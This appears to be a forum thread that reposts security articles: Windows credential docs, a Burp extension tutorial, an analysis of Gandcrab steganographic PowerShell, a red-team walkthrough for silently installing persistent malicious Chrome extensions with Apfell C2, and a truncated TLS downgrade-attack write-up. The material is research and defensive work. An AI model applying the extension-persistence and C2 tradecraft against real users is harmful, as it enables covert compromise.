authentication service that is in use. The next time the service is used, Credential Manager automatically supplies the credential that is stored in the Windows Vault. If it is not accepted, the user is prompted for the correct access information. If access is granted with the new credentials, Credential Manager overwrites the previous credential with the new one and then stores the new credential in the Windows Vault. Security Accounts Manager database The Security Accounts Manager (SAM) is a database that stores local user accounts and groups. It is present in every Windows operating system; however, when a computer is joined to a domain, Active Directory manages domain accounts in Active Directory domains. For example, client computers running a Windows operating system participate in a network domain by communicating with a domain controller even when no human user is logged on. To initiate communications, the computer must have an active account in the domain. Before accepting communications from the computer, the LSA on the domain controller authenticates the computer's identity and then constructs the computer's security context just as it does for a human security principal. This security context defines the identity and capabilities of a user or service on a particular computer or a user, service, or computer on a network. For example, the access token contained within the security context defines the resources (such as a file share or printer) that can be accessed and the actions (such as Read, Write, or Modify) that can be performed by that principal - a user, computer, or service on that resource. The security context of a user or computer can vary from one computer to another, such as when a user logs on to a server or a workstation other than the user's own primary workstation. It can also vary from one session to another, such as when an administrator modifies the user's rights and permissions. In addition, the security context is usually different when a user or computer is operating on a stand-alone basis, in a network, or as part of an Active Directory domain. Local domains and trusted domains When a trust exists between two domains, the authentication mechanisms for each domain rely on the validity of the authentications coming from the other domain. Trusts help to provide controlled access to shared resources in a resource domain (the trusting domain) by verifying that incoming authentication requests come from a trusted authority (the trusted domain). In this way, trusts act as bridges that let only validated authentication requests travel between domains. How a specific trust passes authentication requests depends on how it is configured. Trust relationships can be one-way, by providing access from the trusted domain to resources in the trusting domain, or two-way, by providing access from each domain to resources in the other domain. Trusts are also either nontransitive, in which case a trust exists only between the two trust partner domains, or transitive, in which case a trust automatically extends to any other domains that either of the partners trusts. For information about domain and forest trust relationships regarding authentication, see Delegated Authentication and Trust Relationships. Certificates in Windows authentication A public key infrastructure (PKI) is the combination of software, encryption technologies, processes, and services that enable an organization to secure its communications and business transactions. The ability of a PKI to secure communications and business transactions is based on the exchange of digital certificates between authenticated users and trusted resources. A digital certificate is an electronic document that contains information about the entity it belongs to, the entity it was issued by, a unique serial number or some other unique identification, issuance and expiration dates, and a digital fingerprint. Authentication is the process of determining if a remote host can be trusted. To establish its trustworthiness, the remote host must provide an acceptable authentication certificate. Remote hosts establish their trustworthiness by obtaining a certificate from a certification authority (CA). The CA can, in turn, have certification from a higher authority, which creates a chain of trust. To determine whether a certificate is trustworthy, an application must determine the identity of the root CA, and then determine if it is trustworthy. Similarly, the remote host or local computer must determine if the certificate presented by the user or application is authentic. The certificate presented by the user through the LSA and SSPI is evaluated for authenticity on the local computer for local logon, on the network, or on the domain through the certificate stores in Active Directory. To produce a certificate, authentication data passes through hash algorithms, such as Secure Hash Algorithm 1 (SHA1), to produce a message digest. The message digest is then digitally signed by using the sender's private key to prove that the message digest was produced by the sender. Note SHA1 is the default in Windows 7 and Windows Vista, but was changed to SHA2 in Windows 8. Smart card authentication Smart card technology is an example of certificate-based authentication. Logging on to a network with a smart card provides a strong form of authentication because it uses cryptography-based identification and proof of possession when authenticating a user to a domain. Active Directory Certificate Services (AD CS) provides the cryptographic-based identification through the issuance of a logon certificate for each smart card. For information about smart card authentication, see the Windows Smart Card Technical Reference. Virtual smart card technology was introduced in Windows 8. It stores the smart card's certificate in the PC, and then protects it by using the device's tamper-proof Trusted Platform Module (TPM) security chip. In this way, the PC actually becomes the smart card which must receive the user's PIN in order to be authenticated. Remote and wireless authentication Remote and wireless network authentication is another technology that uses certificates for authentication. The Internet Authentication Service (IAS) and virtual private network servers use Extensible Authentication Protocol-Transport Level Security (EAP-TLS), Protected Extensible Authentication Protocol (PEAP), or Internet Protocol security (IPsec) to perform certificate-based authentication for many types of network access, including virtual private network (VPN) and wireless connections. For information about certificate-based authentication in networking, see Network access authentication and certificates. Sursa: https://docs.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication
- 1 reply
-
- 1
-
-
February 7, 2019 Jake Burp Extension Python Tutorial – Encode/Decode/Hash This post provides step by step instructions for writing a Burp extension using Python. This is different from my previous extension writing tutorial, where we only worked in the message tab, and I will be moving a bit more quickly than in that post. Here is what this post will cover: Importing required modules and accessing the Burp Created a tab for the extension Writing the GUI text fields and buttons Writing functions that occur when you click the buttons This extension will have its own tab and GUI components, not to mention will be a little more useful than the extension written previously. Here is what we are going to be making: This is inspired from a tool of the same name included in OWASP’s ZAP. Let’s get started. Setup Create a folder where you’ll store your extensions – I named mine extensions Download the Jython standalone JAR file – Place into the extensions folder Download exceptions_fix.py to the extensions folder – this will make debugging easier Configure Burp to use Jython – Extender > Options > Python Environment > Select file Create a new file (encodeDecodeHash.py) in your favorite text editor (save it in your extensions folder) Importing required modules and accessing the Extender API, and implementing the debugger Let’s write some code: from burp import IBurpExtender, ITab from javax import swing from java.awt import BorderLayout import sys try: from exceptions_fix import FixBurpExceptions except ImportError: pass The IBurpExtender module is required for all extensions, while ITab will register the tab in Burp and send Burp the UI that we will define. The swing library is what is used to build GUI applications with Jython, and we’ll be using layout management, specifically BorderLayout from the java.awt library. The sys module is imported to allow Python errors to be shown in stdout with the help of the FixBurpExceptions script. I placed that in a Try/Except block so if we don’t have the script the code will still work fine. I’ll be adding more imports when we start writing encoding method, but this is enough for now. This next code snippet will register our extension and create a new tab that will contain the UI. If you’re following along type or paste this code after the imports: class BurpExtender(IBurpExtender, ITab): def registerExtenderCallbacks(self, callbacks): # Required for easier debugging: # https://github.com/securityMB/burp-exceptions sys.stdout = callbacks.getStdout() # Keep a reference to our callbacks object self.callbacks = callbacks # Set our extension name self.callbacks.setExtensionName("Encode/Decode/Hash") # Create the tab self.tab = swing.JPanel(BorderLayout()) # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return # Implement ITab def getTabCaption(self): """Return the text to be displayed on the tab""" return "Encode/Decode/Hash" def getUiComponent(self): """Passes the UI to burp""" return self.tab try: FixBurpExceptions() except: pass This class implements IBurpExtender, which is required for all extensions and must be called BurpExtender. Within the required method, registerExtendedCallbacks, the line self.callbacks keeps a reference to Burp so we can interact with it, and in our case will be used to create the tab in Burp. ITab requires two methods, getTabCaption and getUiComponent, where getTabCaption returns the name of the tab, and getUiComponent returns the UI itself (self.tab), which is created in the line self.tab=swing.JPanel(). FixBurpExceptions is called at the end of the script just in case we have an error (Thanks @SecurityMB!). Save the script to your extensions folder and then load the file into Burp: Extender > Extensions > Add > Extension Details > Extension Type: Python > Select file… > encodeDecodeHash.py The extension should load and you should have a new tab: This tab doesn’t have any features yet, so let’s build the skeleton of the UI. Before I go into the code, I’ll model out the GUI so that it will hopefully make a little more sense. There are different layout managers that you can use in Java, and I chose to use BorderLayout in the main tab, so when I place panels on the tab, I can specify that they should go in relative positions, such as North or Center. Within the two panels I created boxes that contain other boxes. I did this so that text areas and labels would appear on different lines, but stay in the general area that I wanted them to. There are probably better ways to do this, but here is the model: Onto the code: class BurpExtender(IBurpExtender, ITab): ... self.tab = swing.Jpanel(BorderLayout()) # Create the text area at the top of the tab textPanel = swing.JPanel() # Create the label for the text area boxVertical = swing.Box.createVerticalBox() boxHorizontal = swing.Box.createHorizontalBox() textLabel = swing.JLabel("Text to be encoded/decoded/hashed") boxHorizontal.add(textLabel) boxVertical.add(boxHorizontal) # Create the text area itself boxHorizontal = swing.Box.createHorizontalBox() self.textArea = swing.JTextArea('', 6, 100) self.textArea.setLineWrap(True) boxHorizontal.add(self.textArea) boxVertical.add(boxHorizontal) # Add the text label and area to the text panel textPanel.add(boxVertical) # Add the text panel to the top of the main tab self.tab.add(textPanel, BorderLayout.NORTH) # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return ... A bit of explanation. The code (textPanel = swing.JPanel()) creates a new panel that will contain the text label and text area. Then, a box is created (boxVertical), that will be used to hold other boxes (boxHorizontal) that contain the text label and area. The horizontal boxes get added to the vertical box (boxVertical.add(boxHorizontal)), the vertical box is added to the panel we created (textPanel.add(boxVertical)), and that panel is added to the main tab panel at the top (BorderLayout.NORTH). Save the code, unload/reload the extension and this is what you should see: Now we’ll add the tabs: self.tab.add(textPanel, BorderLayout.NORTH) # Created a tabbed pane to go in the center of the # main tab, below the text area tabbedPane = swing.JTabbedPane() self.tab.add("Center", tabbedPane); # First tab firstTab = swing.JPanel() firstTab.layout = BorderLayout() tabbedPane.addTab("Encode", firstTab) # Second tab secondTab = swing.JPanel() secondTab.layout = BorderLayout() tabbedPane.addTab("Decode", secondTab) # Third tab thirdTab = swing.JPanel() thirdTab.layout = BorderLayout() tabbedPane.addTab("Hash", thirdTab) # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return ... After you add this code and save the file, you should have your tabs: To keep this post short, we’re only going to build out the Encode tab, but the steps will be the same for each tab. # First tab firstTab = swing.JPanel() firstTab.layout = BorderLayout() tabbedPane.addTab("Encode", firstTab) # Button for first tab buttonPanel = swing.JPanel() buttonPanel.add(swing.JButton('Encode', actionPerformed=self.encode)) firstTab.add(buttonPanel, "North") # Panel for the encoders. Each label and text field # will go in horizontal boxes which will then go in # a vertical box encPanel = swing.JPanel() boxVertical = swing.Box.createVerticalBox() boxHorizontal = swing.Box.createHorizontalBox() self.b64EncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" Base64 :")) boxHorizontal.add(self.b64EncField) boxVertical.add(boxHorizontal) boxHorizontal = swing.Box.createHorizontalBox() self.urlEncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" URL :")) boxHorizontal.add(self.urlEncField) boxVertical.add(boxHorizontal) boxHorizontal = swing.Box.createHorizontalBox() self.asciiHexEncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" Ascii Hex :")) boxHorizontal.add(self.asciiHexEncField) boxVertical.add(boxHorizontal) boxHorizontal = swing.Box.createHorizontalBox() self.htmlEncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" HTML :")) boxHorizontal.add(self.htmlEncField) boxVertical.add(boxHorizontal) boxHorizontal = swing.Box.createHorizontalBox() self.jsEncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" JavaScript:")) boxHorizontal.add(self.jsEncField) boxVertical.add(boxHorizontal) # Add the vertical box to the Encode tab firstTab.add(boxVertical, "Center") # Second tab ... # Third tab ... # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return # Implement the functions from the button clicks def encode(self, event): pass # Implement ITab def getTabCaption(self): First we create a panel (buttonPanel) to hold our button, and then we add a button to the panel and specify the argument actionPerformed=self.encode, where self.encode is a method that will run when the button is clicked. We define encode at the end of the code snippet, and currently have it doing nothing. We’ll implement the encoders later. Now that our panel has a button, we add that to the first tab of the panel (firstTab.add(buttonPanel, “North”)). Next we create a separate panel for the encoder text labels and fields. Similar to before, we create a big box (boxVertical), and then create a horizontal box (boxHorizontal) for each pair of labels/textfields, which then get added to the big box. Finally that big box gets added to the tab. After saving the file and unloading/reloading, this is what the program should look like: The button might not seem to do anything, but it is actually executing the encode method we defined (which does nothing). Lets fix that method and have it encode the user input: … try: from exceptions_fix import FixBurpExceptions except ImportError: pass import base64 import urllib import binascii import cgi import json ... # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return # Implement the functions from the button clicks def encode(self, event): """Encodes the user input and writes the encoded value to text fields. """ self.b64EncField.text = base64.b64encode(self.textArea.text) self.urlEncField.text = urllib.quote(self.textArea.text) self.asciiHexEncField.text = binascii.hexlify(self.textArea.text) self.htmlEncField.text = cgi.escape(self.textArea.text) self.jsEncField.text = json.dumps(self.textArea.text) # Implement ITab def getTabCaption(self): … The encode method sets the text on the encode fields we created by encoding whatever the user types in the top text area (self.textArea.text). Once you save and unload/reload the file you should have full encoding functionality. And that’s it! The process is the same for the other tabs, and if you’re interested in the whole extension, it is available on my GitHub. Hopefully this post makes developing your own extensions a little easier. It was definitely a good learning experience for me. Feedback is welcome. Sursa: https://laconicwolf.com/2019/02/07/burp-extension-python-tutorial-encode-decode-hash/
-
Un{i}packer Unpacking PE files using Unicorn Engine The usage of runtime packers by malware authors is very common, as it is a technique that helps to hinder analysis. Furthermore, packers are a challenge for antivirus products, as they make it impossible to identify malware by signatures or hashes alone. In order to be able to analyze a packed malware sample, it is often required to unpack the binary. Usually this means, that the analyst will have to manually unpack the binary by using dynamic analysis techniques (Tools: OllyDbg, x64Dbg). There are also some approaches for automatic unpacking, but they are all only available for Windows. Therefore when targeting a packed Windows malware the analyst will require a Windows machine. The goal of our project is to enable platform independent automatic unpacking by using emulation. Supported packers UPX: Cross-platform, open source packer ASPack: Advanced commercial packer with a high compression ratio PEtite: Freeware packer, similar to ASPack FSG: Freeware, fast to unpack Usage Install r2 and YARA pip3 install -r requirements.txt python3 unipacker.py For detailed instructions on how to use Un{i}packer please refer to the Wiki. Additionally, all of the shell commands are documented. To access this information, use the help command Sursa: https://github.com/unipacker/unipacker
-
Super Mario Oddity A few days ago, I was investigating a sample piece of malware where our static analysis flagged a spreadsheet as containing a Trojan but the behavioural trace showed very little happening. This is quite common for various reasons, but one of the quirks of how we work at Bromium is that we care about getting malware to run and fully detonate within our secure containers. This enables our customers to understand the threats they are facing, and to take any other remedial action necessary without any risk to their endpoints or company assets. Running their malware actually makes our customers more secure. A quick look at the macros in this spreadsheet revealed that it was coded to exit Excel immediately if the machine was not based in Italy (country 39): We often see malware samples failing to run based on location, but usually they look for signs of being in Russia. This is widely believed to help groups based there avoid prosecution by local authorities, but of course leads to false-flag usage too. My interest was piqued, so I modified the document to remove this check so it would open and then I could see if we could get the malware to detonate. The usual social engineering prompt is displayed on opening: Roughly translated as ‘It’s not possible to view the preview online. To view the content, you need to click on “enable edit” and “enable content”’. After modifying the spreadsheet, the malware detonates inside one of our containers. We see the usual macro-based launch of cmd.exe and PowerShell with obfuscated arguments. This is very run-of-the-mill, but these arguments stood out as not being from one of the usual obfuscators we see, so I was determined to dig a bit deeper: (truncated very early) As a side note, malware authors actually spend quite a lot of effort on marketing, including often mentioning specific researchers by name within samples. This happens because of the nature of modern Platform Criminality – malware is licensed to affiliates for distribution, and in order to attract the most interest and best prices malware authors need to make a name for themselves. It’s not clear whether or not this sample was actually trying to encourage me to investigate or not, but sometimes huge clues like this are put into samples on purpose. The binary strings are just a list of encoded characters, so this was easily reconstructed to the following code, which looks like PowerShell: At this point, things seemed particularly interesting. My PowerShell skills are basic, but it looks like this sample is trying to download an image and extract some data from the pixel values. There was only one person to turn to – our PowerShell evangelist and polymath Tim Howes, who was also intrigued. Meanwhile, I pulled the images, with each looking roughly like this: (I’ve slightly resized and blurred). Steganographic techniques such as using the low-bits from pixel values are clearly not new, but it’s rare that we see this kind of thing in malspam; even at Bromium, where we normally see slightly more advanced malware that evaded the rest of the endpoint security stack. It’s also pretty hard to defend against this kind of traffic at the firewall. Now over to Tim to make sense of the PowerShell plumbing. A manual re-shuffle to de-obfuscate the code and you can see more clearly the bitwise operation on the blue and green pixels. Since only the lower 4 bits of blue and green have been used, this won’t make a big difference to the image when looked at by a human, but it is quite trivial to hide some code within. Recasting the above code to a different form makes slightly more sense of where in the image we’re extracting from: This equates to the area in blue at the top of the image here: The above code is finding the next level of code from the blue and green channel from pixels in a small region of the image. The lower bits of each pixel are used as adjustments to these and yield minimal differences to the perceived image. Running this presents yet more heavily obfuscated PowerShell: We can work through this by noticing that there is another large string (base64 encoded) sliced/diced into 40 parts. This can be reassembled: Looking at the above, we see they are using a .net decompressor; so employing our own local variables to step through each part yields: This gives a resultant stream of yet more PowerShell: We execute the “-split” operations on the large string and then convert to a string: We now see that $str is still more mildly obfuscated PowerShell: There’s another slice/dice to form “iex” (the alias for invoke-expression in PowerShell): ($env:comspec)[4,15,25] == 'iex'. The manually de-obfuscated PowerShell reveals the final level which is dropping and executing from a site, but only if the output of ‘get-culture’ on the machine matches “ita” (for example if the culture is Italian, which matches the earlier targeting attempts). Thanks Tim! We downloaded the samples from the above, including from an Italy-based VPN and were given various samples of Gandcrab ransomware. Gandcrab has seen phenomenal success last year, initially being distributed by exploit kits and becoming especially prevalent in the Far East. I am generally skeptical of malware attribution claims, and the implications of so much obfuscated code hidden within a picture of Mario and checking for an Italian victim are not obvious; for all we know the fictional Wario may be as likely to be responsible as any geopolitical actor. However, a future avenue for investigation here is to examine the encoded affiliate IDs, and compare against samples we have collected from other sources to see if there are patterns for whom this affiliate is targeting. Another key forensic advantage that we have at Bromium is that we partition our isolation at the granularity of a user task (in this instance, the opening of a piece of malspam from an email). This means we can associate each sample with lots of forensic metadata about the task the user was performing, simply because they are from the same container. Mining our set of Gandcrab samples to track the behaviour of their affiliates is definitely a task for another day. Whether or not they are based in a targeted country, our users can open malicious emails safely and transparently with Bromium as our hardware-enforced containers securely isolate the malware from the host system (our princess is in another castle). IOCs: Original Spreadsheet: 3849381059d9e8bbcc59c253d2cbe1c92f7e1f1992b752d396e349892f2bb0e7 Mario image: 2726cd6796774521d03a5f949e10707424800882955686c886d944d2b2a61e0 Other Mario image: 0c8c27f06a0acb976b8f12ff6749497d4ce1f7a98c2a161b0a9eb956e6955362 Ultimate EXEs: ec2a7e8da04bc4e60652d6f7cc2d41ec68ff900d39fc244cc3b5a29c42acb7a4 630b6f15c770716268c539c5558152168004657beee740e73ee9966d6de1753f February 8, 2019 • Category: Threats • By: Matthew Rowen Sursa: https://www.bromium.com/gandcrab-ransomware-code-hiding-in-image/
-
- 1
-
-
No Place Like Chrome Christopher Ross Feb 8 Chrome extensions were first introduced to the public in December of 2009 and use HTML, JavaScript, and CSS to extend Chrome’s functionality. Extensions can leverage the Chrome API to block ads, change the browser UI, manage cookies, and even work in conjunction with desktop applications. They’re also restricted by a finite set of permissions that are granted by the user during the installation process. With a rich set of native APIs, Chrome extensions provide a more than adequate alternative for hiding malicious code. With the emergence of EDR products and new security features for macOS and Windows 10, endpoint security has improved. However, there has been a lack of detection capabilities for the use of malicious Chrome extensions on macOS. As a result, they have become an enticing initial access and persistence payload. This post will cover a payload delivery mechanism for extensions on macOS, leveraging the auto update feature for offensive purposes, a practical example using Apfell, and some basic, but actionable detection guidance. Payload Delivery There are a few methods that can be used to legitimately install extensions on macOS. Google forces developers to distribute extensions through the web store. Recently, Google changed their policy so that extensions cannot be installed from third party sites. Adversaries may still host extensions on the web store anyway, but it was a necessary policy change. Alternatively, extensions can be installed on macOS with the use of mobile configuration profiles. Configuration profiles are used on macOS and iOS to manage various settings, including power management, DNS servers, login items, WiFi settings, wallpaper, and even applications like Google Chrome. End-users can install profiles by double-clicking on the file or on the command line with the profiles command. Mobile configuration profiles are XML-formatted and follow a relatively simple format. To create a mobile configuration profile, a payload uuid, application ID, and update url (this will be covered later) are required. For more information on configuration profiles, please refer to this article and this reference. Here is an example that can be used as a template. The ExtensionInstallSources key specifies the URL in which extensions can be installed from. Wildcards can be used in the protocol, host, and URI fields. The ExtensionInstallForceList value refers to a list of extensions that will be installed without the users’ consent and cannot be uninstalled. The PayloadRemovalDisallowed key prevents non-admin users from uninstalling the profile. For other keys that can be used to manage extensions and other Google Chrome settings in general please refer to this. Configuration profiles can be utilized to manage a myriad of settings for macOS and warrant further investigation for additional offensive use cases. An interesting note about configuration profiles; they can can be delivered via email and subsequently, the end-user will not see any prompts from Gatekeeper, MacOS’s code signing enforcement and verification tool. However, the user will be prompted to confirm the installation of a profile. Figure 1 If the profile is unsigned, the end-user will be presented with a second prompt (figure 2) before being prompted for admin credentials. Figure 2 However, when installing a signed profile, the OS will only prompt once for the install and then admin credentials. After the installation, the profile contents can be seen in the Profiles preference pane. If the profile is unsigned, that will be noted in red. Figure 3 Now that the extension policy has been set for Chrome, when the application is opened, it will make a series of web requests to the update URL specified in the profile. The update URL should point to an update manifest file that specifies the application ID and the URL for the extension file (.crx). Refer to the auto update documentation for an example manifest file. Next, Chrome will download the extension and save it to ~/Library/Application Support/Google/Chrome/Default/Extensions/APPID. At this point, the extension is loaded into the browser and executed. Note that during this entire process, the configuration profile is the only component that requires user interaction. Similarly, on Windows, an extension can be silently installed by modifying registry keys noted here. However, if the installation source is a third party site, Chrome will only allow inline installs. This type of install will requires users to browse to your site and then redirect users to the Chrome web store to complete the installation. Auto-Update FTW In order to easily manage bug fixes and security patches, extensions can be automatically updated. When hosting extensions in the Chrome Web Store, Google handles updating your extension. Just upload a new copy of your extension and after a few hours, the browser will update the extension via the web store. For extensions hosted outside the web store, developers have more control. Chrome uses the update url in the manifest.json file to periodically check for updates. During this process, Chrome will read the update manifest file and compare the version in the manifest with the current version of the extension. If the manifest version is higher, the browser will download the newest version of the extension and install it. For an example update manifest, please go here. The update manifest is an XML formatted file that contains the APPID and a URL that points to the .crx file. Auto-update is a particularly useful feature for adversaries. In Figures 4 and 5, a malicious extension uses one domain for standard C2 comms and uses another domain to host the update manifest and extension file. Imagine the scenario where incident response has identified the C2 domain as malicious and blocks all traffic to that domain (1). However, traffic to the update URL is still permitted (2 & 3). An adversary can update the manifest version, change the C2 domain (4), the update URL, and even modify some of the extensions core code. After some time, Google Chrome will make a request to the update URL and load the new version of the extension with new C2 domains. Figure 4 Figure 5 Additionally, if an attacker loses control of the extension, or perhaps it even crashed, they can remotely trigger execution with an update. As long as the extension remains installed, Chrome will continue to try and check for updates. If only the manifest version is updated, Chrome will re-install the extension and trigger it’s execution. Next, we’ll cover how to use a PoC Chrome extension and manage the C2 server with Apfell. Malicious Extensions: IRL Apfell is a post-exploitation framework centered around customization and modularity. The framework targets the macOS platform by default, but a user can create new C2 profiles that target any platform. Apfell is an ideal framework to use for a malicious Chrome extension. Lets walk through configuring a custom C2 profile and generating a payload. 1) For initial setup instructions, please see the apfell documentation here. Once the apfell server is up, register a new user and make yourself an admin. Next, you’ll need to clone the apfell-chrome-ext-payload and apfell-chrome-extension-c2server projects onto your apfell server. 2) Navigate to manage operations -> payload management. The payloads for apfell-jxa and linfell are both defined on this page. For each payload, there are several commands defined. Any of these commands can be modified within the console and then updated in the agent (specifically for apfell-jxa and linfell). At the bottom left corner of the payloads page is an import button. This allows a user to import a custom payload, along with each command, from a json file. Please import this file to save some time creating the payload. If the import was successful, you should see chrome-extension as a new payload type with a few commands to start. Figure 6 3) Now open a terminal session on your apfell server and navigate to the apfell-chrome-extension-c2server project. Run the install.sh script to install golang and compile the server binary. Verify that the server binary compiled successfully and is present in the $HOME/go/src/apfell-chrome-extension-c2server directory. 4) Navigate to Manage Operations -> C2 Profiles. Click on Register C2 profile on the bottom left of the page. Here you’ll provide the name of the profile, description, and supported payloads. Upload the C2 server binary ($HOME/go/src/apfell-chrome-extension-c2server/server) and the C2 client code (./apfell-chrome-ext-payload/apfell/c2profiles/chrome-extension.js) for the extension. Figure 7 5) Once the profile is submitted, the profiles page should update and show the new profile. 6) Back in your terminal session on the apfell server, edit the c2config.json file and choose the options you desire. Figure 8 7) Copy the c2config.json to the apfell/app/c2profiles/default/chrome-extension/ directory. Rename the server binary to <c2profilename>_server. This is necessary in order to start the c2 server from the apfell UI. Now start the C2 server in apfell. Figure 9 😎 Navigate to Create Components -> Create Base Payload. Select chrome-extension for the C2 profile and payload type. Fill out the required parameters (Hostname, Port, Endpoint, SSL, and Interval). Provide the desired filename and then click submit. If all goes well, a success message will be displayed at the top of the page. Figure 10 9) To download the payload, go to Manage Operations -> Payload Management. Now that you’ve setup the extension payload and C2 profile, you can export them to use in other operations. 10) Copy and paste all of the code from the payload into chrome extension project file ./apfell-chrome-ext-payload/apfell/extension-skeleton/src/bg/main.js. Edit the manifest.json file in the extension-skeleton directory and replace all of the *_REPLACE values. The update_url does not need to be a legitimate URL if the auto update feature isn’t used. Figure 11 11) Open Google Chrome, click on More -> More Tools -> Extensions and toggle developer mode. Click on pack extension and select the extension-skeleton directory within the apfell-chrome-ext-payload project. Click on pack extension once again and Chrome will output the .crx file with the private key. Note that you’ll need to keep the private key in order to update the extension. 12) The last piece of information you’ll need is the application ID. Unfortunately, the only way to obtain this is to install the extension and note the ID shown on the extensions page. Drag the extension file (.crx) onto the extensions page to install it. Figure 12 13) Now you have the information needed to create your mobile configuration file and host the update manifest and crx file. Add the application ID and url that points to the crx file to the update manifest file. Then add the application id and update_url to the example mobile configuration file here. Additionally, you’ll need to add in two unique UUIDs. Figure 13 Figure 14 14) Now the setup is complete! If everything is properly configured, installing the mobile configuration profile should trigger a silent install of the extension and add a new callback on the apfell active callbacks page. Refer to the Payload Delivery section for details on installing the profile. Figure 15 Here’s a quick demonstration of delivering a malicious chrome extension via a mobile configuration profile. Detection In the target infection section, we briefly covered a delivery mechanism for chrome extensions that allows for silent and hidden installs via mobile configuration profiles. From a defensive perspective, detections for this delivery mechanism should be focused on the *profiles *command and its arguments. This would be most suitable in a situation where the attacker already has access to the victim host. Specifically, the command for installing a profile looks like this:profiles install -type=configuration -path=/path/to/profile.mobileconfig . The corresponding osquery rule would look like this: “SELECT * FROM process_events WHERE cmdline=’%profiles install%’;”. This may not be the best answer in an enterprise environment but its a solid starting point. Also note that the osquery schema now includes a chrome extensions table. Additionally, when a profile is installed through the UI, the MCXCompositor process writes a binary plist to the /Library/Managed Preferences/username/ directory. The plist file is a copy of the mobile configuration profile. The filename is determined by the PayloadType key in the configuration profile. Figure 16 There may be other data sources that enable more robust detections for the use of mobile configuration profiles but this should serve as a good start. Google Chrome extensions should definitely be considered for initial access and persistence. I would encourage other red teamers and security researchers to investigate the Chrome APIs for additional functionality. Originally published at www.xorrior.com. Sursa: https://posts.specterops.io/no-place-like-chrome-122e500e421f
-
Downgrade Attack on TLS 1.3 and Vulnerabilities in Major TLS Libraries On November 30, 2018. We disclosed CVE-2018-12404, CVE-2018-19608, CVE-2018-16868, CVE-2018-16869, and CVE-2018-16870. These were from vulnerabilities found back in August 2018 in several TLS libraries. Back on May 15, I approached Yuval Yarom with a few issues I had found in some TLS implementations. This led to a collaboration between Eyal Ronen, Robert Gillham, Daniel Genkin, Adi Shamir, Yuval Yarom and me. Spearheaded by Eyal, the research has now been published here. And as you can see, the inventor of RSA himself is now recommending you to deprecate RSA in TLS. We tested nine different TLS implementations against cache attacks and seven were found to be vulnerable: OpenSSL, Amazon s2n, MbedTLS, Apple CoreTLS, Mozilla NSS, WolfSSL, and GnuTLS. The cat is not dead yet, with two lives remaining thanks to BearSSL (developed by my colleague Thomas Pornin) and Google's BoringSSL. The attack leverages a side-channel leak via cache access timings of these implementations in order to break the RSA key exchanges of TLS implementations. The attack is interesting from multiple points of view (besides the fact that it affects many major TLS implementations): It affects all versions of TLS (including TLS 1.3) and QUIC. Where the latter version of TLS does not even offer an RSA key exchange! This prowess is achieved because of the only known downgrade attack on TLS 1.3. It uses state-of-the-art cache attack techniques. Flush+Reload? Prime+Probe? Branch-Predition? We have it. The attack is very efficient. We found ways to ACTIVELY target any browser, slow some of them down, or use the long tail distribution to repeatdly try to break a session. We even make use of lattices to speed up the problem. Manger and Ben-Or on RSA PKCS#1 v1.5. You heard of Bleichenbacher's million messages attack? Guess what, we found better. We use Manger's OAEP attack on RSA PKCS#1 v1.5 and even Ben-Or's algorithm which is more efficient than and was published BEFORE Bleichenbacher's work in 1998. I uploaded some of the code here. To learn more about the research, you should read the white paper. I will talk specifically about protocol-level exploitation in this blog post. Attacking RSA, The Origins Although the research of Ben-Or et al. was initially used to support the security proofs of RSA, it also outlined attacks on the protocol. Fifteen years later, in 1998, Daniel Bleichenbacher discovers a padding oracle and devises a unique and practical attack of his own on RSA. The consequences are severe. Most TLS implementations could be broken, and thus mitigations were designed to prevent Daniel's attack. Follows a long series of "re-discovery" in which the world realizes that it is not so easy to implement the advised mitigations: Bleichenbacher (CRYPTO 1998) also called the 1 million message attack, BB98, padding oracle attack on PKCS#1 v1.5, etc. Klima et al. (CHES 2003) Bleichenbacher’s Attack Strikes Again: Breaking PKCS#1 V1.5 In Xml Encryption (ESORICS 2012) Degabriele et al. (CT-RSA 2012) Bardou et al. (CRYPTO 2012) Cross-Tenant Side-Channel Attacks in PaaS Clouds (CCS 2014) Revisiting SSL/TLS Implementations: New Bleichenbacher Side Channels and Attacks (USENIX 2014) On the Security of TLS 1.3 and QUIC Against Weaknesses in PKCS#1 v1.5 Encryption (CCS 2015) DROWN (USENIX 2016) Return Of Bleichenbacher's Oracle Threat (USENIX 2018) The Dangers of Key Reuse: Practical Attacks on IPsec IKE (USENIX 2018) Let's be realistic, the mitigations that developers had to implement were unrealistic. Furthermore, an implementation that would attempt to log such attacks would actually help the attacks. Isn't that funny? The research I'm talking about today can be seen as one more of these "re-discoveries." My previous boss' boss (Scott Stender) once told me: "You can either be the first paper on the subject, or the best written one, or the last one." We're definitely not the first one, I don't know if we write that well, but we sure are hoping to be the last one RSA in TLS? Briefly, SSL/TLS (except TLS 1.3) can use an RSA key exchange during a handshake to negotiate a shared secret. An RSA key exchange is pretty straight forward: The client encrypts a shared secret under the server's RSA public key, then the server receives it and decrypts it. If we can use our attack to decrypt this value, we can then passively decrypt the session (and obtain a cookie for example), or we can actively impersonate one of the peer. Attacking Browsers, In Practice. We employ the BEAST-attack model (in addition to being colocated with the victim server for the cache attack) which I have previously explained in a video here. Beast With this position, we then attempt to decrypt the session between a victim client (Bob) and bank.com: we can serve him with some javascript content that will continuously attempt new connections on bank.com. (If it doesn't attempt a new connection, we can force it by making the current one fail since we're in the middle.) Why several connections instead of just one? Because most browsers (except Firefox which we can fool) will time out after some time (usually 30s). If an RSA key exchange is negotiated between the two peers: it's great, we have all the time in the world to passively attack the protocol. If an RSA key exchange is NOT negotiated: we need to actively attack the session to either downgrade or fake the server's RSA signature (more on that later). This takes time, because the attack requires us to send thousands of messages to the server. It will likely fail. But if we can try again, many times? It will likely succeed after a few trials. And that is why we continuously send connection attempts to bank.com. Attacking TLS 1.3 Two ways exist to attack TLS 1.3. In each attack, the server needs to support an older version of the protocol as well. The first technique relies on the fact that the current server’s public key is an RSA public key, used to sign its ephemeral keys during the handshake, and that the older version of TLS that the server supports re-use the same keys. The second one relies on the fact that both peers support an older 